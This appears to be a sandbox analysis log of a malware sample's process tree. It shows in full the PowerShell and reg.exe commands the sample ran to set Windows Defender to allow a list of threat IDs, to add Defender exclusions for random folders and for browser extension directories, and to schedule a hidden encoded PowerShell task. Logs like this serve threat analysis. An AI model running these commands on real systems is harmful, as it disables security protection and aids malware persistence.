                                                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              PID:1816
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4876
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4128
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1912
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1884
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4164
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4220
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1768
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3424
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:2156
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3724
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1796
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2572
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2520
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:488
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:2104
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:2316
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2476
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4900
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3664
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3328
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:688
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:2156
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:1640
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4276
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5016
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3640
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:1556
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:3040
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QVWjqfQytQiLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QVWjqfQytQiLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XPXpeEiKDyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XPXpeEiKDyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dSFCGoajU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dSFCGoajU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yPeEHKRKYSIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yPeEHKRKYSIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIlQlxhqsAqlQuVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIlQlxhqsAqlQuVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\cksoItPsQhGrxIuH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\cksoItPsQhGrxIuH\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                        PID:4460
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QVWjqfQytQiLC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:1924
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QVWjqfQytQiLC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:4172
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QVWjqfQytQiLC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4328
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XPXpeEiKDyUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:3040
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XPXpeEiKDyUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:3784
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4132
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:3832
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dSFCGoajU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4032
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dSFCGoajU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:2476
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yPeEHKRKYSIU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:4900
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yPeEHKRKYSIU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:3612
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIlQlxhqsAqlQuVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4692
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIlQlxhqsAqlQuVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:1380
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:4648
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:4968
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:1460
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3048
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:5096
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:1584
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\cksoItPsQhGrxIuH /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:1096
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\cksoItPsQhGrxIuH /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:1100
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "gmILOxiAV" /SC once /ST 00:07:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
